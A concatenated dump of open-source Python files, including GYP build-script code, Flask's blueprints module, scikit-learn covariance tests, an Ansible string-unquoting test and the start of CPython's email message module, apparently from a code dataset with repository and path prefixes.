'--depth as a workaround.'
# -D on the command line sets variable defaults - D isn't just for define,
# it's for default. Perhaps there should be a way to force (-F?) a
# variable's value so that it can't be overridden by anything else.
cmdline_default_variables = {}
defines = []
if options.use_environment:
defines += ShlexEnv('GYP_DEFINES')
if options.defines:
defines += options.defines
cmdline_default_variables = NameValueListToDict(defines)
if DEBUG_GENERAL in gyp.debug.keys():
DebugOutput(DEBUG_GENERAL,
"cmdline_default_variables: %s" % cmdline_default_variables)
# Set up includes.
includes = []
# If ~/.gyp/include.gypi exists, it'll be forcibly included into every
# .gyp file that's loaded, before anything else is included.
if home_dot_gyp != None:
default_include = os.path.join(home_dot_gyp, 'include.gypi')
if os.path.exists(default_include):
includes.append(default_include)
# Command-line --include files come after the default include.
if options.includes:
includes.extend(options.includes)
# Generator flags should be prefixed with the target generator since they
# are global across all generator runs.
gen_flags = []
if options.use_environment:
gen_flags += ShlexEnv('GYP_GENERATOR_FLAGS')
if options.generator_flags:
gen_flags += options.generator_flags
generator_flags = NameValueListToDict(gen_flags)
if DEBUG_GENERAL in gyp.debug.keys():
DebugOutput(DEBUG_GENERAL, "generator_flags: %s" % generator_flags)
# TODO: Remove this and the option after we've gotten folks to move to the
# generator flag.
if options.msvs_version:
print >>sys.stderr, \
'DEPRECATED: Use generator flag (-G msvs_version=' + \
options.msvs_version + ') instead of --msvs-version=' + \
options.msvs_version
generator_flags['msvs_version'] = options.msvs_version
# Generate all requested formats (use a set in case we got one format request
# twice)
for format in set(options.formats):
params = {'options': options,
'build_files': build_files,
'generator_flags': generator_flags,
'cwd': os.getcwd(),
'build_files_arg': build_files_arg,
'gyp_binary': sys.argv[0],
'home_dot_gyp': home_dot_gyp}
# Start with the default variables from the command line.
[generator, flat_list, targets, data] = Load(build_files, format,
cmdline_default_variables,
includes, options.depth,
params, options.check)
# TODO(mark): Pass |data| for now because the generator needs a list of
# build files that came in. In the future, maybe it should just accept
# a list, and not the whole data dict.
# NOTE: flat_list is the flattened dependency graph specifying the order
# that targets may be built. Build systems that operate serially or that
# need to have dependencies defined before dependents reference them should
# generate targets in the order specified in flat_list.
generator.GenerateOutput(flat_list, targets, data, params)
# Done
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
ycsoft/FatCat-Server | refs/heads/master | LIBS/boost_1_58_0/libs/python/test/operators_wrapper.py | 12 | from operators_wrapper_ext import *
class D2(vector): pass
d2 = D2()
for lhs in (v,d,d2):
-lhs
for rhs in (v,d,d2):
lhs + rhs
lhs += rhs
|
toontownfunserver/Panda3D-1.9.0 | refs/heads/master | direct/gui/__init__.py | 12133432 | |
tushar7795/MicroBlog | refs/heads/master | flask/lib/python2.7/site-packages/wtforms/ext/i18n/__init__.py | 12133432 | |
sergiocorato/odoomrp-wip | refs/heads/8.0 | stock_quant_manual_assign_without_lock_lot/tests/test_stock_quant_manual_assign_without_lock_lot.py | 5 | # -*- coding: utf-8 -*-
# Copyright © 2017 Ainara Galdona - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from openerp.addons.stock_quant_manual_assign.tests\
.test_stock_quant_manual_assign import TestStockQuantManualAssign
from openerp.tests.common import at_install, post_install
@at_install(False)
@post_install(True)
class TestStockQuantManualAssignWithoutLockLot(TestStockQuantManualAssign):
def setUp(self):
super(TestStockQuantManualAssignWithoutLockLot, self).setUp()
|
zbal/ansible | refs/heads/devel | test/units/parsing/test_unquote.py | 152 | # coding: utf-8
# (c) 2015, Toshio Kuratomi <tkuratomi@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from nose import tools
from ansible.compat.tests import unittest
from ansible.parsing.splitter import unquote
# Tests using nose's test generators cannot use unittest base class.
# http://nose.readthedocs.org/en/latest/writing_tests.html#test-generators
class TestUnquote:
UNQUOTE_DATA = (
(u'1', u'1'),
(u'\'1\'', u'1'),
(u'"1"', u'1'),
(u'"1 \'2\'"', u'1 \'2\''),
(u'\'1 "2"\'', u'1 "2"'),
(u'\'1 \'2\'\'', u'1 \'2\''),
(u'"1\\"', u'"1\\"'),
(u'\'1\\\'', u'\'1\\\''),
(u'"1 \\"2\\" 3"', u'1 \\"2\\" 3'),
(u'\'1 \\\'2\\\' 3\'', u'1 \\\'2\\\' 3'),
(u'"', u'"'),
(u'\'', u'\''),
# Not entirely sure these are good but they match the current
# behaviour
(u'"1""2"', u'1""2'),
(u'\'1\'\'2\'', u'1\'\'2'),
(u'"1" 2 "3"', u'1" 2 "3'),
(u'"1"\'2\'"3"', u'1"\'2\'"3'),
)
def check_unquote(self, quoted, expected):
tools.eq_(unquote(quoted), expected)
def test_unquote(self):
for datapoint in self.UNQUOTE_DATA:
yield self.check_unquote, datapoint[0], datapoint[1]
|
jorpramo/flask | refs/heads/master | flask/blueprints.py | 141 | # -*- coding: utf-8 -*-
"""
flask.blueprints
~~~~~~~~~~~~~~~~
Blueprints are the recommended way to implement larger or more
pluggable applications in Flask 0.7 and later.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from functools import update_wrapper
from .helpers import _PackageBoundObject, _endpoint_from_view_func
class BlueprintSetupState(object):
"""Temporary holder object for registering a blueprint with the
application. An instance of this class is created by the
:meth:`~flask.Blueprint.make_setup_state` method and later passed
to all register callback functions.
"""
def __init__(self, blueprint, app, options, first_registration):
#: a reference to the current application
self.app = app
#: a reference to the blueprint that created this setup state.
self.blueprint = blueprint
#: a dictionary with all options that were passed to the
#: :meth:`~flask.Flask.register_blueprint` method.
self.options = options
#: as blueprints can be registered multiple times with the
#: application and not everything wants to be registered
#: multiple times on it, this attribute can be used to figure
#: out if the blueprint was registered in the past already.
self.first_registration = first_registration
subdomain = self.options.get('subdomain')
if subdomain is None:
subdomain = self.blueprint.subdomain
#: The subdomain that the blueprint should be active for, ``None``
#: otherwise.
self.subdomain = subdomain
url_prefix = self.options.get('url_prefix')
if url_prefix is None:
url_prefix = self.blueprint.url_prefix
#: The prefix that should be used for all URLs defined on the
#: blueprint.
self.url_prefix = url_prefix
#: A dictionary with URL defaults that is added to each and every
#: URL that was defined with the blueprint.
self.url_defaults = dict(self.blueprint.url_values_defaults)
self.url_defaults.update(self.options.get('url_defaults', ()))
def add_url_rule(self, rule, endpoint=None, view_func=None, **options):
"""A helper method to register a rule (and optionally a view function)
to the application. The endpoint is automatically prefixed with the
blueprint's name.
"""
if self.url_prefix:
rule = self.url_prefix + rule
options.setdefault('subdomain', self.subdomain)
if endpoint is None:
endpoint = _endpoint_from_view_func(view_func)
defaults = self.url_defaults
if 'defaults' in options:
defaults = dict(defaults, **options.pop('defaults'))
self.app.add_url_rule(rule, '%s.%s' % (self.blueprint.name, endpoint),
view_func, defaults=defaults, **options)
class Blueprint(_PackageBoundObject):
"""Represents a blueprint. A blueprint is an object that records
functions that will be called with the
:class:`~flask.blueprints.BlueprintSetupState` later to register functions
or other things on the main application. See :ref:`blueprints` for more
information.
.. versionadded:: 0.7
"""
warn_on_modifications = False
_got_registered_once = False
def __init__(self, name, import_name, static_folder=None,
static_url_path=None, template_folder=None,
url_prefix=None, subdomain=None, url_defaults=None,
root_path=None):
_PackageBoundObject.__init__(self, import_name, template_folder,
root_path=root_path)
self.name = name
self.url_prefix = url_prefix
self.subdomain = subdomain
self.static_folder = static_folder
self.static_url_path = static_url_path
self.deferred_functions = []
if url_defaults is None:
url_defaults = {}
self.url_values_defaults = url_defaults
def record(self, func):
"""Registers a function that is called when the blueprint is
registered on the application. This function is called with the
state as argument as returned by the :meth:`make_setup_state`
method.
"""
if self._got_registered_once and self.warn_on_modifications:
from warnings import warn
warn(Warning('The blueprint was already registered once '
'but is getting modified now. These changes '
'will not show up.'))
self.deferred_functions.append(func)
def record_once(self, func):
"""Works like :meth:`record` but wraps the function in another
function that will ensure the function is only called once. If the
blueprint is registered a second time on the application, the
function passed is not called.
"""
def wrapper(state):
if state.first_registration:
func(state)
return self.record(update_wrapper(wrapper, func))
def make_setup_state(self, app, options, first_registration=False):
"""Creates an instance of :meth:`~flask.blueprints.BlueprintSetupState`
object that is later passed to the register callback functions.
Subclasses can override this to return a subclass of the setup state.
"""
return BlueprintSetupState(self, app, options, first_registration)
def register(self, app, options, first_registration=False):
"""Called by :meth:`Flask.register_blueprint` to register a blueprint
on the application. This can be overridden to customize the register
behavior. Keyword arguments from
:func:`~flask.Flask.register_blueprint` are directly forwarded to this
method in the `options` dictionary.
"""
self._got_registered_once = True
state = self.make_setup_state(app, options, first_registration)
if self.has_static_folder:
state.add_url_rule(self.static_url_path + '/<path:filename>',
view_func=self.send_static_file,
endpoint='static')
for deferred in self.deferred_functions:
deferred(state)
def route(self, rule, **options):
"""Like :meth:`Flask.route` but for a blueprint. The endpoint for the
:func:`url_for` function is prefixed with the name of the blueprint.
"""
def decorator(f):
endpoint = options.pop("endpoint", f.__name__)
self.add_url_rule(rule, endpoint, f, **options)
return f
return decorator
def add_url_rule(self, rule, endpoint=None, view_func=None, **options):
"""Like :meth:`Flask.add_url_rule` but for a blueprint. The endpoint for
the :func:`url_for` function is prefixed with the name of the blueprint.
"""
if endpoint:
assert '.' not in endpoint, "Blueprint endpoints should not contain dots"
self.record(lambda s:
s.add_url_rule(rule, endpoint, view_func, **options))
def endpoint(self, endpoint):
"""Like :meth:`Flask.endpoint` but for a blueprint. This does not
prefix the endpoint with the blueprint name, this has to be done
explicitly by the user of this method. If the endpoint is prefixed
with a `.` it will be registered to the current blueprint, otherwise
it's an application independent endpoint.
"""
def decorator(f):
def register_endpoint(state):
state.app.view_functions[endpoint] = f
self.record_once(register_endpoint)
return f
return decorator
def app_template_filter(self, name=None):
"""Register a custom template filter, available application wide. Like
:meth:`Flask.template_filter` but for a blueprint.
:param name: the optional name of the filter, otherwise the
function name will be used.
"""
def decorator(f):
self.add_app_template_filter(f, name=name)
return f
return decorator
def add_app_template_filter(self, f, name=None):
"""Register a custom template filter, available application wide. Like
:meth:`Flask.add_template_filter` but for a blueprint. Works exactly
like the :meth:`app_template_filter` decorator.
:param name: the optional name of the filter, otherwise the
function name will be used.
"""
def register_template(state):
state.app.jinja_env.filters[name or f.__name__] = f
self.record_once(register_template)
def app_template_test(self, name=None):
"""Register a custom template test, available application wide. Like
:meth:`Flask.template_test` but for a blueprint.
.. versionadded:: 0.10
:param name: the optional name of the test, otherwise the
function name will be used.
"""
def decorator(f):
self.add_app_template_test(f, name=name)
return f
return decorator
def add_app_template_test(self, f, name=None):
"""Register a custom template test, available application wide. Like
:meth:`Flask.add_template_test` but for a blueprint. Works exactly
like the :meth:`app_template_test` decorator.
.. versionadded:: 0.10
:param name: the optional name of the test, otherwise the
function name will be used.
"""
def register_template(state):
state.app.jinja_env.tests[name or f.__name__] = f
self.record_once(register_template)
def app_template_global(self, name=None):
"""Register a custom template global, available application wide. Like
:meth:`Flask.template_global` but for a blueprint.
.. versionadded:: 0.10
:param name: the optional name of the global, otherwise the
function name will be used.
"""
def decorator(f):
self.add_app_template_global(f, name=name)
return f
return decorator
def add_app_template_global(self, f, name=None):
"""Register a custom template global, available application wide. Like
:meth:`Flask.add_template_global` but for a blueprint. Works exactly
like the :meth:`app_template_global` decorator.
.. versionadded:: 0.10
:param name: the optional name of the global, otherwise the
function name will be used.
"""
def register_template(state):
state.app.jinja_env.globals[name or f.__name__] = f
self.record_once(register_template)
def before_request(self, f):
"""Like :meth:`Flask.before_request` but for a blueprint. This function
is only executed before each request that is handled by a function of
that blueprint.
"""
self.record_once(lambda s: s.app.before_request_funcs
.setdefault(self.name, []).append(f))
return f
def before_app_request(self, f):
"""Like :meth:`Flask.before_request`. Such a function is executed
before each request, even if outside of a blueprint.
"""
self.record_once(lambda s: s.app.before_request_funcs
.setdefault(None, []).append(f))
return f
def before_app_first_request(self, f):
"""Like :meth:`Flask.before_first_request`. Such a function is
executed before the first request to the application.
"""
self.record_once(lambda s: s.app.before_first_request_funcs.append(f))
return f
def after_request(self, f):
"""Like :meth:`Flask.after_request` but for a blueprint. This function
is only executed after each request that is handled by a function of
that blueprint.
"""
self.record_once(lambda s: s.app.after_request_funcs
.setdefault(self.name, []).append(f))
return f
def after_app_request(self, f):
"""Like :meth:`Flask.after_request` but for a blueprint. Such a function
is executed after each request, even if outside of the blueprint.
"""
self.record_once(lambda s: s.app.after_request_funcs
.setdefault(None, []).append(f))
return f
def teardown_request(self, f):
"""Like :meth:`Flask.teardown_request` but for a blueprint. This
function is only executed when tearing down requests handled by a
function of that blueprint. Teardown request functions are executed
when the request context is popped, even when no actual request was
performed.
"""
self.record_once(lambda s: s.app.teardown_request_funcs
.setdefault(self.name, []).append(f))
return f
def teardown_app_request(self, f):
"""Like :meth:`Flask.teardown_request` but for a blueprint. Such a
function is executed when tearing down each request, even if outside of
the blueprint.
"""
self.record_once(lambda s: s.app.teardown_request_funcs
.setdefault(None, []).append(f))
return f
def context_processor(self, f):
"""Like :meth:`Flask.context_processor` but for a blueprint. This
function is only executed for requests handled by a blueprint.
"""
self.record_once(lambda s: s.app.template_context_processors
.setdefault(self.name, []).append(f))
return f
def app_context_processor(self, f):
"""Like :meth:`Flask.context_processor` but for a blueprint. Such a
function is executed each request, even if outside of the blueprint.
"""
self.record_once(lambda s: s.app.template_context_processors
.setdefault(None, []).append(f))
return f
def app_errorhandler(self, code):
"""Like :meth:`Flask.errorhandler` but for a blueprint. This
handler is used for all requests, even if outside of the blueprint.
"""
def decorator(f):
self.record_once(lambda s: s.app.errorhandler(code)(f))
return f
return decorator
def url_value_preprocessor(self, f):
"""Registers a function as URL value preprocessor for this
blueprint. It's called before the view functions are called and
can modify the url values provided.
"""
self.record_once(lambda s: s.app.url_value_preprocessors
.setdefault(self.name, []).append(f))
return f
def url_defaults(self, f):
"""Callback function for URL defaults for this blueprint. It's called
with the endpoint and values and should update the values passed
in place.
"""
self.record_once(lambda s: s.app.url_default_functions
.setdefault(self.name, []).append(f))
return f
def app_url_value_preprocessor(self, f):
"""Same as :meth:`url_value_preprocessor` but application wide.
"""
self.record_once(lambda s: s.app.url_value_preprocessors
.setdefault(None, []).append(f))
return f
def app_url_defaults(self, f):
"""Same as :meth:`url_defaults` but application wide.
"""
self.record_once(lambda s: s.app.url_default_functions
.setdefault(None, []).append(f))
return f
def errorhandler(self, code_or_exception):
"""Registers an error handler that becomes active for this blueprint
only. Please be aware that routing does not happen local to a
blueprint so an error handler for 404 usually is not handled by
a blueprint unless it is caused inside a view function. Another
special case is the 500 internal server error which is always looked
up from the application.
Otherwise works as the :meth:`~flask.Flask.errorhandler` decorator
of the :class:`~flask.Flask` object.
"""
def decorator(f):
self.record_once(lambda s: s.app._register_error_handler(
self.name, code_or_exception, f))
return f
return decorator
def register_error_handler(self, code_or_exception, f):
"""Non-decorator version of the :meth:`errorhandler` error attach
function, akin to the :meth:`~flask.Flask.register_error_handler`
application-wide function of the :class:`~flask.Flask` object but
for error handlers limited to this blueprint.
.. versionadded:: 1.0
"""
self.record_once(lambda s: s.app._register_error_handler(
self.name, code_or_exception, f))
|
mwv/scikit-learn | refs/heads/master | sklearn/covariance/tests/test_covariance.py | 142 | # Author: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Gael Varoquaux <gael.varoquaux@normalesup.org>
# Virgile Fritsch <virgile.fritsch@inria.fr>
#
# License: BSD 3 clause
import numpy as np
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_warns
from sklearn import datasets
from sklearn.covariance import empirical_covariance, EmpiricalCovariance, \
ShrunkCovariance, shrunk_covariance, \
LedoitWolf, ledoit_wolf, ledoit_wolf_shrinkage, OAS, oas
X = datasets.load_diabetes().data
X_1d = X[:, 0]
n_samples, n_features = X.shape
def test_covariance():
# Tests Covariance module on a simple dataset.
# test covariance fit from data
cov = EmpiricalCovariance()
cov.fit(X)
emp_cov = empirical_covariance(X)
assert_array_almost_equal(emp_cov, cov.covariance_, 4)
assert_almost_equal(cov.error_norm(emp_cov), 0)
assert_almost_equal(
cov.error_norm(emp_cov, norm='spectral'), 0)
assert_almost_equal(
cov.error_norm(emp_cov, norm='frobenius'), 0)
assert_almost_equal(
cov.error_norm(emp_cov, scaling=False), 0)
assert_almost_equal(
cov.error_norm(emp_cov, squared=False), 0)
assert_raises(NotImplementedError,
cov.error_norm, emp_cov, norm='foo')
# Mahalanobis distances computation test
mahal_dist = cov.mahalanobis(X)
print(np.amin(mahal_dist), np.amax(mahal_dist))
assert(np.amin(mahal_dist) > 0)
# test with n_features = 1
X_1d = X[:, 0].reshape((-1, 1))
cov = EmpiricalCovariance()
cov.fit(X_1d)
assert_array_almost_equal(empirical_covariance(X_1d), cov.covariance_, 4)
assert_almost_equal(cov.error_norm(empirical_covariance(X_1d)), 0)
assert_almost_equal(
cov.error_norm(empirical_covariance(X_1d), norm='spectral'), 0)
# test with one sample
# FIXME I don't know what this test does
X_1sample = np.arange(5)
cov = EmpiricalCovariance()
assert_warns(UserWarning, cov.fit, X_1sample)
assert_array_almost_equal(cov.covariance_,
np.zeros(shape=(5, 5), dtype=np.float64))
# test integer type
X_integer = np.asarray([[0, 1], [1, 0]])
result = np.asarray([[0.25, -0.25], [-0.25, 0.25]])
assert_array_almost_equal(empirical_covariance(X_integer), result)
# test centered case
cov = EmpiricalCovariance(assume_centered=True)
cov.fit(X)
assert_array_equal(cov.location_, np.zeros(X.shape[1]))
def test_shrunk_covariance():
# Tests ShrunkCovariance module on a simple dataset.
# compare shrunk covariance obtained from data and from MLE estimate
cov = ShrunkCovariance(shrinkage=0.5)
cov.fit(X)
assert_array_almost_equal(
shrunk_covariance(empirical_covariance(X), shrinkage=0.5),
cov.covariance_, 4)
# same test with shrinkage not provided
cov = ShrunkCovariance()
cov.fit(X)
assert_array_almost_equal(
shrunk_covariance(empirical_covariance(X)), cov.covariance_, 4)
# same test with shrinkage = 0 (<==> empirical_covariance)
cov = ShrunkCovariance(shrinkage=0.)
cov.fit(X)
assert_array_almost_equal(empirical_covariance(X), cov.covariance_, 4)
# test with n_features = 1
X_1d = X[:, 0].reshape((-1, 1))
cov = ShrunkCovariance(shrinkage=0.3)
cov.fit(X_1d)
assert_array_almost_equal(empirical_covariance(X_1d), cov.covariance_, 4)
# test shrinkage coeff on a simple data set (without saving precision)
cov = ShrunkCovariance(shrinkage=0.5, store_precision=False)
cov.fit(X)
assert(cov.precision_ is None)
def test_ledoit_wolf():
# Tests LedoitWolf module on a simple dataset.
# test shrinkage coeff on a simple data set
X_centered = X - X.mean(axis=0)
lw = LedoitWolf(assume_centered=True)
lw.fit(X_centered)
shrinkage_ = lw.shrinkage_
score_ = lw.score(X_centered)
assert_almost_equal(ledoit_wolf_shrinkage(X_centered,
assume_centered=True),
shrinkage_)
assert_almost_equal(ledoit_wolf_shrinkage(X_centered, assume_centered=True,
block_size=6),
shrinkage_)
# compare shrunk covariance obtained from data and from MLE estimate
lw_cov_from_mle, lw_shinkrage_from_mle = ledoit_wolf(X_centered,
assume_centered=True)
assert_array_almost_equal(lw_cov_from_mle, lw.covariance_, 4)
assert_almost_equal(lw_shinkrage_from_mle, lw.shrinkage_)
# compare estimates given by LW and ShrunkCovariance
scov = ShrunkCovariance(shrinkage=lw.shrinkage_, assume_centered=True)
scov.fit(X_centered)
assert_array_almost_equal(scov.covariance_, lw.covariance_, 4)
# test with n_features = 1
X_1d = X[:, 0].reshape((-1, 1))
lw = LedoitWolf(assume_centered=True)
lw.fit(X_1d)
lw_cov_from_mle, lw_shinkrage_from_mle = ledoit_wolf(X_1d,
assume_centered=True)
assert_array_almost_equal(lw_cov_from_mle, lw.covariance_, 4)
assert_almost_equal(lw_shinkrage_from_mle, lw.shrinkage_)
assert_array_almost_equal((X_1d ** 2).sum() / n_samples, lw.covariance_, 4)
# test shrinkage coeff on a simple data set (without saving precision)
lw = LedoitWolf(store_precision=False, assume_centered=True)
lw.fit(X_centered)
assert_almost_equal(lw.score(X_centered), score_, 4)
assert(lw.precision_ is None)
# Same tests without assuming centered data
# test shrinkage coeff on a simple data set
lw = LedoitWolf()
lw.fit(X)
assert_almost_equal(lw.shrinkage_, shrinkage_, 4)
assert_almost_equal(lw.shrinkage_, ledoit_wolf_shrinkage(X))
assert_almost_equal(lw.shrinkage_, ledoit_wolf(X)[1])
assert_almost_equal(lw.score(X), score_, 4)
# compare shrunk covariance obtained from data and from MLE estimate
lw_cov_from_mle, lw_shinkrage_from_mle = ledoit_wolf(X)
assert_array_almost_equal(lw_cov_from_mle, lw.covariance_, 4)
assert_almost_equal(lw_shinkrage_from_mle, lw.shrinkage_)
# compare estimates given by LW and ShrunkCovariance
scov = ShrunkCovariance(shrinkage=lw.shrinkage_)
scov.fit(X)
assert_array_almost_equal(scov.covariance_, lw.covariance_, 4)
# test with n_features = 1
X_1d = X[:, 0].reshape((-1, 1))
lw = LedoitWolf()
lw.fit(X_1d)
lw_cov_from_mle, lw_shinkrage_from_mle = ledoit_wolf(X_1d)
assert_array_almost_equal(lw_cov_from_mle, lw.covariance_, 4)
assert_almost_equal(lw_shinkrage_from_mle, lw.shrinkage_)
assert_array_almost_equal(empirical_covariance(X_1d), lw.covariance_, 4)
# test with one sample
# FIXME I don't know what this test does
X_1sample = np.arange(5)
lw = LedoitWolf()
assert_warns(UserWarning, lw.fit, X_1sample)
assert_array_almost_equal(lw.covariance_,
np.zeros(shape=(5, 5), dtype=np.float64))
# test shrinkage coeff on a simple data set (without saving precision)
lw = LedoitWolf(store_precision=False)
lw.fit(X)
assert_almost_equal(lw.score(X), score_, 4)
assert(lw.precision_ is None)
def test_ledoit_wolf_large():
# test that ledoit_wolf doesn't error on data that is wider than block_size
rng = np.random.RandomState(0)
# use a number of features that is larger than the block-size
X = rng.normal(size=(10, 20))
lw = LedoitWolf(block_size=10).fit(X)
# check that covariance is about diagonal (random normal noise)
assert_almost_equal(lw.covariance_, np.eye(20), 0)
cov = lw.covariance_
# check that the result is consistent with not splitting data into blocks.
lw = LedoitWolf(block_size=25).fit(X)
assert_almost_equal(lw.covariance_, cov)
def test_oas():
# Tests OAS module on a simple dataset.
# test shrinkage coeff on a simple data set
X_centered = X - X.mean(axis=0)
oa = OAS(assume_centered=True)
oa.fit(X_centered)
shrinkage_ = oa.shrinkage_
score_ = oa.score(X_centered)
# compare shrunk covariance obtained from data and from MLE estimate
oa_cov_from_mle, oa_shinkrage_from_mle = oas(X_centered,
assume_centered=True)
assert_array_almost_equal(oa_cov_from_mle, oa.covariance_, 4)
assert_almost_equal(oa_shinkrage_from_mle, oa.shrinkage_)
# compare estimates given by OAS and ShrunkCovariance
scov = ShrunkCovariance(shrinkage=oa.shrinkage_, assume_centered=True)
scov.fit(X_centered)
assert_array_almost_equal(scov.covariance_, oa.covariance_, 4)
# test with n_features = 1
X_1d = X[:, 0].reshape((-1, 1))
oa = OAS(assume_centered=True)
oa.fit(X_1d)
oa_cov_from_mle, oa_shinkrage_from_mle = oas(X_1d, assume_centered=True)
assert_array_almost_equal(oa_cov_from_mle, oa.covariance_, 4)
assert_almost_equal(oa_shinkrage_from_mle, oa.shrinkage_)
assert_array_almost_equal((X_1d ** 2).sum() / n_samples, oa.covariance_, 4)
# test shrinkage coeff on a simple data set (without saving precision)
oa = OAS(store_precision=False, assume_centered=True)
oa.fit(X_centered)
assert_almost_equal(oa.score(X_centered), score_, 4)
assert(oa.precision_ is None)
# Same tests without assuming centered data--------------------------------
# test shrinkage coeff on a simple data set
oa = OAS()
oa.fit(X)
assert_almost_equal(oa.shrinkage_, shrinkage_, 4)
assert_almost_equal(oa.score(X), score_, 4)
# compare shrunk covariance obtained from data and from MLE estimate
oa_cov_from_mle, oa_shinkrage_from_mle = oas(X)
assert_array_almost_equal(oa_cov_from_mle, oa.covariance_, 4)
assert_almost_equal(oa_shinkrage_from_mle, oa.shrinkage_)
# compare estimates given by OAS and ShrunkCovariance
scov = ShrunkCovariance(shrinkage=oa.shrinkage_)
scov.fit(X)
assert_array_almost_equal(scov.covariance_, oa.covariance_, 4)
# test with n_features = 1
X_1d = X[:, 0].reshape((-1, 1))
oa = OAS()
oa.fit(X_1d)
oa_cov_from_mle, oa_shinkrage_from_mle = oas(X_1d)
assert_array_almost_equal(oa_cov_from_mle, oa.covariance_, 4)
assert_almost_equal(oa_shinkrage_from_mle, oa.shrinkage_)
assert_array_almost_equal(empirical_covariance(X_1d), oa.covariance_, 4)
# test with one sample
# FIXME I don't know what this test does
X_1sample = np.arange(5)
oa = OAS()
assert_warns(UserWarning, oa.fit, X_1sample)
assert_array_almost_equal(oa.covariance_,
np.zeros(shape=(5, 5), dtype=np.float64))
# test shrinkage coeff on a simple data set (without saving precision)
oa = OAS(store_precision=False)
oa.fit(X)
assert_almost_equal(oa.score(X), score_, 4)
assert(oa.precision_ is None)
|
maohongyuan/kbengine | refs/heads/master | kbe/src/lib/python/Lib/email/message.py | 63 | # Copyright (C) 2001-2007 Python Software Foundation
# Author: Barry Warsaw
# Contact: email-sig@python.org
"""Basic message object for the email package object model."""
__all__ = ['Message']
import re
import uu
import quopri
import warnings
from io import BytesIO, StringIO
# Intrapackage imports
from email import utils
from email import errors
from email._policybase import compat32
from email import charset as _charset
from email._encoded_words import decode_b
Charset = _charset.Charset
SEMISPACE = '; '
# Regular expression that matches `special' characters in parameters, the
# existence of which force quoting of the parameter value.
tspecials = re.compile(r'[ \(\)<>@,;:\\"/\[\]\?=]')
def _splitparam(param):
# Split header parameters. BAW: this may be too simple. It isn't
# strictly RFC 2045 (section 5.1) compliant, but it catches most headers
# found in the wild. We may eventually need a full fledged parser.
# RDM: we might have a Header here; for now just stringify it.
a, sep, b = str(param).partition(';')
if not sep:
return a.strip(), None
return a.strip(), b.strip()
def _formatparam(param, value=None, quote=True):
    """Convenience function to format and return a key=value pair.
    This will quote the value if needed or if quote is true. If value is a
    three tuple (charset, language, value), it will be encoded according
    to RFC2231 rules. If it contains non-ascii characters it will likewise
    be encoded according to RFC2231 rules, using the utf-8 charset and
    a null language.
    """
    if value is not None and len(value) > 0:
        # A tuple is used for RFC 2231 encoded parameter values where items
        # are (charset, language, value). charset is a string, not a Charset
        # instance. RFC 2231 encoded values are never quoted, per RFC.
        if isinstance(value, tuple):
            # Encode as per RFC 2231; the '*' suffix marks the parameter
            # name as carrying an extended (charset'language'value) value.
            param += '*'
            value = utils.encode_rfc2231(value[2], value[0], value[1])
            return '%s=%s' % (param, value)
        else:
            try:
                # Plain string value: if it is pure ASCII it can be emitted
                # directly (quoted below if needed) ...
                value.encode('ascii')
            except UnicodeEncodeError:
                # ... otherwise fall back to RFC 2231 encoding with the
                # utf-8 charset and an empty language, per the docstring.
                param += '*'
                value = utils.encode_rfc2231(value, 'utf-8', '')
                return '%s=%s' % (param, value)
        # BAW: Please check this. I think that if quote is set it should
        # force quoting even if not necessary.
        if quote or tspecials.search(value):
            return '%s="%s"' % (param, utils.quote(value))
        else:
            return '%s=%s' % (param, value)
    else:
        # No (or empty) value: emit the bare parameter name.
        return param
def _parseparam(s):
    """Split a ;-separated parameter string into a list of 'name=value' parts.

    Attribute names are lower-cased and whitespace is stripped; semicolons
    inside double-quoted values do not split.
    """
    # RDM This might be a Header, so for now stringify it.
    s = ';' + str(s)
    plist = []
    while s[:1] == ';':
        s = s[1:]
        end = s.find(';')
        # Skip candidate ';' separators that fall inside a quoted string:
        # an odd number of unescaped '"' before the ';' means we are still
        # inside quotes, so keep searching for the next ';'.
        while end > 0 and (s.count('"', 0, end) - s.count('\\"', 0, end)) % 2:
            end = s.find(';', end + 1)
        if end < 0:
            end = len(s)
        f = s[:end]
        if '=' in f:
            # Normalize: lower-case the attribute name, strip whitespace
            # around both the name and the value.
            i = f.index('=')
            f = f[:i].strip().lower() + '=' + f[i+1:].strip()
        plist.append(f.strip())
        s = s[end:]
    return plist
def _unquotevalue(value):
    # This is different than utils.collapse_rfc2231_value() because it doesn't
    # try to convert the value to a unicode.  Message.get_param() and
    # Message.get_params() are both currently defined to return the tuple in
    # the face of RFC 2231 parameters.
    if not isinstance(value, tuple):
        return utils.unquote(value)
    # RFC 2231 triple: only the VALUE element is unquoted; charset and
    # language pass through untouched.
    charset, language, text = value
    return charset, language, utils.unquote(text)
class Message:
"""Basic message object.
A message object is defined as something that has a bunch of RFC 2822
headers and a payload. It may optionally have an envelope header
(a.k.a. Unix-From or From_ header). If the message is a container (i.e. a
multipart or a message/rfc822), then the payload is a list of Message
objects, otherwise it is a string.
Message objects implement part of the `mapping' interface, which assumes
there is exactly one occurrence of the header per message. Some headers
do in fact appear multiple times (e.g. Received) and for those headers,
you must use the explicit API to set or get all the headers. Not all of
the mapping methods are implemented.
"""
    def __init__(self, policy=compat32):
        """Initialize an empty message.

        'policy' controls header parsing and serialization behavior; the
        compat32 default keeps backward-compatible (email5) semantics.
        """
        self.policy = policy
        self._headers = []        # ordered list of (name, value) tuples
        self._unixfrom = None     # optional Unix From_ envelope line
        self._payload = None      # scalar (str) payload or list of subparts
        self._charset = None      # Charset recorded by set_charset(), if any
        # Defaults for multipart messages
        self.preamble = self.epilogue = None
        self.defects = []         # parse defects recorded by a parser
        # Default content type
        self._default_type = 'text/plain'
def __str__(self):
"""Return the entire formatted message as a string.
